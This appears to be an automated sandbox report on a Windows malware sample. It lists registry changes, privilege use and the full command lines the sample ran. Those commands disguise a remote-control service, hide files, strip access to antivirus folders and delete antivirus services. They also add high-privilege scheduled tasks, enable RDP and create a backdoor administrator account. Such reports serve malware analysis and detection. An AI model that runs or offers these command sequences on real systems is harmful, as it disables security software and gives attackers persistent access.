| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\MIME\Database | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings | C:\ProgramData\Microsoft\Intel\R8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\ | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ | C:\Users\Admin\AppData\Local\Temp\update.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| N/A | N/A | C:\Programdata\RealtekHD\taskhost.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\WindowsTask\MicrosoftHost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\WindowsTask\MicrosoftHost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows\winit.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\R8.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\update.exe
"C:\Users\Admin\AppData\Local\Temp\update.exe"
C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
C:\Windows\SysWOW64\sc.exe
sc delete swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\R8.exe
C:\ProgramData\Microsoft\Intel\R8.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv 9kLyR5iSeUyzqWd6LudYsQ.0.2
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
